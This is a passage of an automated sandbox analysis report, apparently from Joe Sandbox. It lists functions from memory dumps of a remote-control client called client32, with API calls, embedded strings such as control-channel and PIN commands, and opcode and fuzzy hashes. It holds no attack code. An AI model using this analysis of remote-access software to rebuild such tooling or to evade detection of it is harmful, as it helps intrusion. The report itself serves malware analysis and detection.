Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CombineCreateDeleteObjectRect$Indirect
String ID:
API String ID: 3044651595-0
Opcode ID: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
Instruction ID: 27b6d86d25d7e193214482d66684a995ae6d2575b2198652133f57a3d860c4fb
Opcode Fuzzy Hash: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
Instruction Fuzzy Hash: 26116031A50702AFE721CE64D888B9AF7ECFB45716F00812EE66992180C770B881CB93

Function 68C86CFE Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 68C86D0A

Part of subcall function 68C86F64: __getptd_noexit.LIBCMT ref: 68C86F67
Part of subcall function 68C86F64: __amsg_exit.LIBCMT ref: 68C86F74

__getptd.LIBCMT ref: 68C86D21
__amsg_exit.LIBCMT ref: 68C86D2F
__lock.LIBCMT ref: 68C86D3F
__updatetlocinfoEx_nolock.LIBCMT ref: 68C86D53

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 7a69d21f89a3e53bc2a6484f57fe58d7c94f87d303770a054bc3a0bd26bbc8ab
Instruction ID: 6f97c949cdbc2088c81ba07b62562220b22ec19edd4fe605eb3ac9eb820b7db2
Opcode Fuzzy Hash: 7a69d21f89a3e53bc2a6484f57fe58d7c94f87d303770a054bc3a0bd26bbc8ab
Instruction Fuzzy Hash: 50F090B69E8B10DBDA11AF644809F6E3FA0AF4072CF91850AE654A72C0FB649901DE55

Function 11057380 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 375windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(000301CE,00000501,00000000,00000000), ref: 11057461

Strings

Unable to select/accept connection within 10sec, ignoring cmd %d, xrefs: 1105747B
Warning. DoNotify(%d) not processed, xrefs: 1105835B
Warning. Eval period expired - ignoring cmd %d (x%x) - idata %x - VistaUI %d, xrefs: 110574EA

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessagePost
String ID: Unable to select/accept connection within 10sec, ignoring cmd %d$Warning. DoNotify(%d) not processed$Warning. Eval period expired - ignoring cmd %d (x%x) - idata %x - VistaUI %d
API String ID: 410705778-2398254728
Opcode ID: ba57e33ba6e0677790ef1c60b987477872059b8d4379fee97220d80381384bfa
Instruction ID: 05798701b428304c80057879d977071bcb7a017165537b33727636eef533cf84
Opcode Fuzzy Hash: ba57e33ba6e0677790ef1c60b987477872059b8d4379fee97220d80381384bfa
Instruction Fuzzy Hash: 6DD10975E0064A9BDB94CF95D880BAEF7B5FB84328F5082BEDD1557380EB356940CBA0

Function 1101B1E0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 195COMMON

Download Yara Rule

APIs

Part of subcall function 110DC630: EnterCriticalSection.KERNEL32(111E9064,11018545,62C07B5E,?,?,?,1117A7A8,000000FF), ref: 110DC631

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

std::exception::exception.LIBCMT ref: 1101B426
__CxxThrowException@8.LIBCMT ref: 1101B441

Part of subcall function 11008D80: std::_Xinvalid_argument.LIBCPMT ref: 11008D9A

Strings

NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B399
NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B3BA

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalEnterException@8SectionThrowXinvalid_argument_memsetstd::_std::exception::exceptionwsprintf
String ID: NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
API String ID: 2637870501-623348194
Opcode ID: 501380415829e7f00f99f0435bccbe1191ad463096e9ecbb08638e77824d70d0
Instruction ID: 57dd9297704c65ab0c6bcb40d8263c5768676fb733a16b5b2db7577f0494a42a
Opcode Fuzzy Hash: 501380415829e7f00f99f0435bccbe1191ad463096e9ecbb08638e77824d70d0
Instruction Fuzzy Hash: B87181B5D00359DFEB10CFA4C884BDDFBB4AF05318F248159D825AB381EB75AA84CB91

Function 68C70C40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 68C7DBD0: _malloc.LIBCMT ref: 68C7DBE9
Part of subcall function 68C7DBD0: wsprintfA.USER32 ref: 68C7DC04
Part of subcall function 68C7DBD0: _memset.LIBCMT ref: 68C7DC27

std::exception::exception.LIBCMT ref: 68C70D9C
__CxxThrowException@8.LIBCMT ref: 68C70DB1

Strings

DATA, xrefs: 68C70CE5
NAME, xrefs: 68C70CD0

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID: DATA$NAME
API String ID: 1338273076-4000142801
Opcode ID: 2febc9e060d0de71f5d2f4cf54ec12899f981571d3cb9ed2c905413cff35fea6
Instruction ID: 8dd95af826447fca9ffb7fd3a55053b4ea7d82b860a3b1dfb4ae12c2fb51e48f
Opcode Fuzzy Hash: 2febc9e060d0de71f5d2f4cf54ec12899f981571d3cb9ed2c905413cff35fea6
Instruction Fuzzy Hash: 6A41E8B5C0025DAFDB50DFE9D880AEEBBB4FB08314F90452EE926A7240F7355A05CB91

Function 68C76170 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C7619F

Part of subcall function 68C733A0: wsprintfA.USER32 ref: 68C734FD

Part of subcall function 68C77D00: __vswprintf.LIBCMT ref: 68C77D26

Part of subcall function 68C77B60: _sprintf.LIBCMT ref: 68C77B77

Part of subcall function 68C777E0: _free.LIBCMT ref: 68C777EF

Strings

PIN=%s, xrefs: 68C76238
CMD=CONTROL_SEND_PIN, xrefs: 68C76226
PINserver, xrefs: 68C761B0

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: __vswprintf_free_memset_sprintfwsprintf
String ID: CMD=CONTROL_SEND_PIN$PIN=%s$PINserver
API String ID: 2968883096-3759296614
Opcode ID: 6d6fe947b29a9d628f6aea6174e22a515a24a15a5a03005db00baa8508524caf
Instruction ID: 54ed8cfe13e198cd2b1424dd55ce22cdb41f190d2d84cabc9bb52281ecd89912
Opcode Fuzzy Hash: 6d6fe947b29a9d628f6aea6174e22a515a24a15a5a03005db00baa8508524caf
Instruction Fuzzy Hash: F6314376D00118AADB60DB75DC91FEEB7B8EB88714F9082D9A50DE7181FE345A848B60

Function 68C66CAD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 68C66D0A
GetProcAddress.KERNEL32(?,InternetReadFile), ref: 68C66D72

Strings

InternetQueryDataAvailable, xrefs: 68C66D04
InternetReadFile, xrefs: 68C66D6C

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: InternetQueryDataAvailable$InternetReadFile
API String ID: 190572456-1434219782
Opcode ID: 6b9885834209401103c30cb9f9f0d4bcd5c864975c5a6b5a201fc1cc5d02e0f9
Instruction ID: 016ce2a558650903ea760e7c93186611c51ca70fd5c277fa6854e235942639de
Opcode Fuzzy Hash: 6b9885834209401103c30cb9f9f0d4bcd5c864975c5a6b5a201fc1cc5d02e0f9
Instruction Fuzzy Hash: F63135769001A9DFCB20DF68CCC0AA9B7F4FF49358B5048B9E698DB200E670A9C5CF50

Function 68C77970 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 79networkCOMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,?,00000000), ref: 68C779F1
WSAGetLastError.WSOCK32(?,?,?,00000000), ref: 68C77A16

Strings

httputil.c, xrefs: 68C779C8
hbuf->data, xrefs: 68C779CD

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID: hbuf->data$httputil.c
API String ID: 1452528299-2732665889
Opcode ID: f60c3d86f58fb984aba695749266e3b4e6f175b5be005588d8bd3dc293c52c41
Instruction ID: 1287c4c5b79ac7f1ca6cebb60a265486930586fa212a01e84c2475fb5d007c41
Opcode Fuzzy Hash: f60c3d86f58fb984aba695749266e3b4e6f175b5be005588d8bd3dc293c52c41
Instruction Fuzzy Hash: F0215E7A601B059FD330CE29D880E27B7F5EF85764B54C82DE8AA87601F731F8429B90

Function 11039390 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 110393B2

Part of subcall function 1115F7E6: __getptd.LIBCMT ref: 1115F804

_strtok.LIBCMT ref: 11039433

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

; >, xrefs: 110393A9, 1103942C
CLTCONN.CPP, xrefs: 110393E7

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$ErrorExitLastMessageProcess__getptdwsprintf
String ID: ; >$CLTCONN.CPP
API String ID: 3120919156-788487980
Opcode ID: dcf81aafb7d70219b407bb39dde41256934e084b07b6762410a41ac6d4931455
Instruction ID: 48fd02c5cc66f23834ff9d805c81fd3cb0a4cfabe792bc6ab9c015f56f8a8e7f
Opcode Fuzzy Hash: dcf81aafb7d70219b407bb39dde41256934e084b07b6762410a41ac6d4931455
Instruction Fuzzy Hash: 4821E775F1425B6BD701CEA58C40F9AB6D49F85359F0440A5FE08DB380FAB4AD0183D2

Function 11031170 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(62C07B5E,00000000,?,62C07B5E,1118736B,000000FF,?,11066188,NSMWClass,62C07B5E,?,1106DC18), ref: 110311AA
__strdup.LIBCMT ref: 110311F5

Part of subcall function 110310B0: LoadLibraryA.KERNEL32(Kernel32.dll,62C07B5E,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
Part of subcall function 110310B0: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031120
Part of subcall function 110310B0: GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
Part of subcall function 110310B0: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154

Strings

NSMWClassVista, xrefs: 110311EF, 110311F4, 11031218
NSMWClass, xrefs: 110311BF

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCurrentFreeLoadProcProcessVersion__strdup
String ID: NSMWClass$NSMWClassVista
API String ID: 319803333-889775840
Opcode ID: e2128c7920c129d5655456ea2413f3e62162671e8cd6b8b3b6cef9dd89fff3e0
Instruction ID: da22cb9b74e46dcd904e816c1cfbcb9dca7c1c5d087ee23a6b3981c0c6242146
Opcode Fuzzy Hash: e2128c7920c129d5655456ea2413f3e62162671e8cd6b8b3b6cef9dd89fff3e0
Instruction Fuzzy Hash: 2721D272E286855FD701CF688C407EAFBFAAB8A625F4086A9EC55C7780E736D805C750

Function 68C66CE7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 68C66D0A
GetProcAddress.KERNEL32(?,InternetReadFile), ref: 68C66D72

Strings

InternetQueryDataAvailable, xrefs: 68C66D04
InternetReadFile, xrefs: 68C66D6C

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: InternetQueryDataAvailable$InternetReadFile
API String ID: 190572456-1434219782
Opcode ID: b16a3ad027ac1b9e2e6385966e0f6dc6e6b9b43729877caeddf6df4e7e308ef7
Instruction ID: 2f92a1022221fb428e399d369bb1bedec73442fcafe037534ba3a7c2200dcbd0
Opcode Fuzzy Hash: b16a3ad027ac1b9e2e6385966e0f6dc6e6b9b43729877caeddf6df4e7e308ef7
Instruction Fuzzy Hash: EA2148769041AA9FDB21DF54C8C0AE8B7F4BB48315F5048B9EA98A7200E6709DC98F40

Function 68C660D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

__wcstoui64.LIBCMT ref: 68C66107

Part of subcall function 68C849AE: strtoxl.LIBCMT ref: 68C849D0

EnterCriticalSection.KERNEL32(68CAB898,00000000,?,?,?,?,?,?,?,?,?,?,?,-000397EB), ref: 68C66129
LeaveCriticalSection.KERNEL32(68CAB898,?,?,?,?,?,?,?,?,?,?,?,-000397EB,?,?,68C73361), ref: 68C66168

Strings

CONNECTION_ID, xrefs: 68C660F0

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave__wcstoui64strtoxl
String ID: CONNECTION_ID
API String ID: 2450600163-332495620
Opcode ID: 8826f1b5d1f890f9b4e19bb4cb93343e405f57fe6aa95d417f14a0e361a2b909
Instruction ID: b255cba4d001eac2e6a958a9396025392dbfb2935c457edb602b8ee44bcaa37c
Opcode Fuzzy Hash: 8826f1b5d1f890f9b4e19bb4cb93343e405f57fe6aa95d417f14a0e361a2b909
Instruction Fuzzy Hash: 26113D76944A09AFEF200AD89CC1F5F36789B41378F854039EA2653303F771A9C38693

Function 68C66BD0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 68C66C0F
SetLastError.KERNEL32(00000078), ref: 68C66C2E

Strings

InternetQueryOptionA, xrefs: 68C66C09
*, xrefs: 68C66C34

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: *$InternetQueryOptionA
API String ID: 199729137-4161725205
Opcode ID: b0c79dd75584f27e4f7072b85b7fad0fbda632e28d2a7a207f269bd7e2d7724e
Instruction ID: 1d0292ca395dd41a294b96af90d088146aec30c62688ba722f9cc4e0d1048183
Opcode Fuzzy Hash: b0c79dd75584f27e4f7072b85b7fad0fbda632e28d2a7a207f269bd7e2d7724e
Instruction Fuzzy Hash: 78215071900608EFCF50DF68D884A6DBBF4FB49324F50416AE956AB240E770AA81CF90

Function 11063300 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 11063340
_strtok.LIBCMT ref: 11063370
_strtok.LIBCMT ref: 11063388

Strings

,= , xrefs: 1106333A, 11063369, 11063381

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
